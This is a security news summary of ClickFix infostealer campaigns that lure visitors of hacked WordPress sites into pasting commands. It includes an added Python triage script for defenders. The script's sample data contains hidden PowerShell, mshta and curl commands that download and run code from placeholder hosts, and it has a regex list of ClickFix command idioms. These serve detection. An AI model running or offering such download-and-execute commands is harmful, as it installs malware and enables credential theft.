Malware & Ransomware · HIGH

Malware - ClickFix Techniques Evolve in Infostealer Campaigns


In short: attackers are tricking visitors of hacked websites into running a command that installs information-stealing malware on their own computers.

Quick Summary

A surge in ClickFix activity is delivering infostealer malware through more than 250 compromised WordPress sites. Because the lure fires on any visitor to an infected site, the threat reaches users worldwide, and both site operators and end users need to take specific precautions.

What Happened

Cybercriminals are refining ClickFix techniques to deliver new infostealer malware. One campaign has compromised over 250 WordPress sites across 12 countries. Injected pages present social engineering lures, such as a fake Cloudflare CAPTCHA challenge, that instruct the visitor to copy a command and run it themselves; the visitor, not an exploit, executes the malicious code. The campaign has been active since December 2025.

The attackers' delivery chain stages payloads in memory rather than writing an executable to disk, which leaves fewer file artifacts for antivirus to scan. In a separate ClickFix variant detected by Microsoft, the lure tells victims to paste the command into Windows Terminal instead of the Win+R Run dialog that earlier ClickFix lures relied on. The scale and consistency of the site compromises point to a highly automated and organized operation.

Who's Being Targeted

The compromised WordPress sites include regional news outlets, local businesses, and even a U.S. Senate candidate's official webpage. This spread suggests the attackers are not selecting sectors but compromising whatever sites they can reach in order to maximize the number of visitors who see the lure. The fake CAPTCHA is aimed at those visitors, so a site operator's weak security directly endangers the site's audience.

Signs of Infection

The ClickFix campaign delivers multiple infostealer payloads, including two previously unknown variants. One notable payload is the DoubleDonut Loader, which injects code into legitimate Windows processes; because the malware operates almost entirely in memory, file-based detection is difficult. The clearest warning sign is the lure itself: a web page that asks you to press Win+R (or open Windows Terminal) and paste a command to "verify you are human". Anyone who did so should treat the machine as infected and check what was run.
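The two places a pasted ClickFix command leaves a trace are the Run dialog's history (the `RunMRU` registry key, which keeps each command with a trailing `\1` and orders them in `MRUList`) and, for the Windows Terminal variant, PowerShell's PSReadLine history file. The following triage script is an added example, not code from the article or from Rapid7 or Microsoft. It parses a constructed `RunMRU` export and a constructed history excerpt and flags commands that combine the idioms ClickFix lures typically use (script hosts, download cradles, hidden windows, remote URLs). The pattern list and the sample commands are assumptions chosen to illustrate the technique; they are not indicators from this campaign.

```python
import re

# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU,
# exported as value name -> data. Windows stores each Run-dialog entry as
# "<command>\1" and lists the slots in MRUList with the newest first.
# These entries are made up for this example, not indicators from the article.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "regedit\\1",
    "c": 'powershell -w hidden -c "iex (iwr http://captcha.example/verify -UseBasicParsing)"\\1',
}

# Constructed excerpt of a PSReadLine history file
# (%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt),
# which records commands typed into PowerShell, including under Windows Terminal.
SAMPLE_PS_HISTORY = """Get-ChildItem C:\\Users
mshta http://verify.example/check.hta
curl.exe -s http://cdn.example/x.txt -o %TEMP%\\x.txt && start %TEMP%\\x.txt
Get-Process
"""

# Idioms typical of "paste this to verify" commands. Assumption: these reflect
# common ClickFix tradecraft in general, not the exact commands of this campaign.
CLICKFIX_PATTERNS = [
    (r"\bmshta(\.exe)?\b", "mshta script host"),
    (r"\b(iex|invoke-expression)\b", "inline execution (iex)"),
    (r"\b(iwr|invoke-webrequest|curl(\.exe)?|wget|certutil)\b", "download cradle"),
    (r"-(w|windowstyle)\s+hidden", "hidden window"),
    (r"-(encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"\bhttps?://", "remote URL"),
]


def parse_runmru(values):
    """Return Run-dialog commands newest first, stripping the trailing \\1 marker."""
    commands = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def clickfix_indicators(command):
    """Return the labels of every pattern a single command line matches."""
    return [label for pattern, label in CLICKFIX_PATTERNS
            if re.search(pattern, command, re.IGNORECASE)]


def flag_commands(commands, threshold=2):
    """Return (command, indicators) for commands hitting at least `threshold` patterns.

    Requiring two hits keeps a lone 'curl' or bare URL typed by an admin from
    being flagged on its own; tune the threshold to the environment.
    """
    flagged = []
    for cmd in commands:
        hits = clickfix_indicators(cmd)
        if len(hits) >= threshold:
            flagged.append((cmd, hits))
    return flagged


def scan_history_text(text):
    """Apply flag_commands to every non-empty line of a PSReadLine history file."""
    return flag_commands([line for line in text.splitlines() if line.strip()])


if __name__ == "__main__":
    for cmd, hits in flag_commands(parse_runmru(SAMPLE_RUNMRU)):
        print("RunMRU:", cmd, "->", ", ".join(hits))
    for cmd, hits in scan_history_text(SAMPLE_PS_HISTORY):
        print("PSReadLine:", cmd, "->", ", ".join(hits))
```

On a real host, replace the constructed dictionary with a `reg export` of the key or a `winreg` read, and point `scan_history_text` at the user's `ConsoleHost_history.txt`. Two caveats: a command pasted into a `cmd.exe` tab of Windows Terminal leaves no PSReadLine entry, and `RunMRU` only records what went through the Run dialog, so an empty result does not prove nothing was executed.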

How to Protect Yourself

For website operators, the first step is to keep the WordPress admin login panel off the public internet: Rapid7 noted that most of the compromised sites had publicly accessible admin pages, which made them easy targets. Keeping WordPress core and plugins updated and enforcing strong passwords on administrator accounts reduces the chance that a site is turned into a lure. For visitors, the rule is simple: no legitimate CAPTCHA or "verification" step ever requires you to open the Run dialog or a terminal and paste a command, so any page that asks for this should be closed, not followed.

As the landscape of cyber threats continues to evolve, staying informed and proactive is key to maintaining security.

🔒 Pro insight: ClickFix needs no software vulnerability; the victim runs the command by hand, so patching and exploit-prevention controls do not stop it, and in-memory payloads sidestep file-based antivirus. Defenses have to shift to user awareness, restricting interactive PowerShell and script hosts for ordinary users, and monitoring what gets executed from the Run dialog and terminals.

Original article from CSO Online

Related Pings

Malware & Ransomware · HIGH

Malware - ClickFix Campaigns Distribute MacSync Infostealer

Three ClickFix campaigns are spreading the MacSync infostealer through fake AI tool installers. Targeting macOS users, these campaigns exploit social engineering tactics to steal sensitive data. Stay vigilant and protect your devices from these evolving threats.

The Hacker News
Malware & Ransomware · HIGH

GlassWorm Malware - New Phase of Supply-Chain Attack

Hackers are hijacking Open VSX extensions to spread GlassWorm malware through dependency abuse. Developers are at risk from seemingly innocent tools that install malicious payloads. It's crucial to monitor and audit your extensions to stay safe from this evolving threat.

CSO Online
Malware & Ransomware · HIGH

Malware - ForceMemo Compromises Python Repositories on GitHub

In a troubling development, hundreds of GitHub accounts have been compromised due to the ForceMemo campaign. This attack injects malware into Python repositories, risking sensitive data theft. Developers are urged to strengthen their security measures to prevent further breaches.

SecurityWeek
Malware & Ransomware · HIGH

Warlock Ransomware - Dissecting New Attack Techniques

Warlock ransomware has upgraded its attack strategies, targeting tech and government sectors. Their new tactics enhance persistence and evasion, posing significant risks to data security.

Trend Micro Research
Malware & Ransomware · HIGH

GoPix - Advanced Banking Trojan Exploits Memory Techniques

GoPix is a new banking Trojan targeting Brazilian users, using advanced memory techniques to steal sensitive data. It exploits trust in popular services to spread. Users must stay vigilant against these sophisticated attacks to protect their finances.

Kaspersky Securelist
Malware & Ransomware · HIGH

Steam Malware - FBI Seeks Help to Track Campaign Victims

The FBI is investigating a malware campaign on Steam. Gamers are urged to report any infections. This effort aims to identify the threat actor and protect users from further harm.

Infosecurity Magazine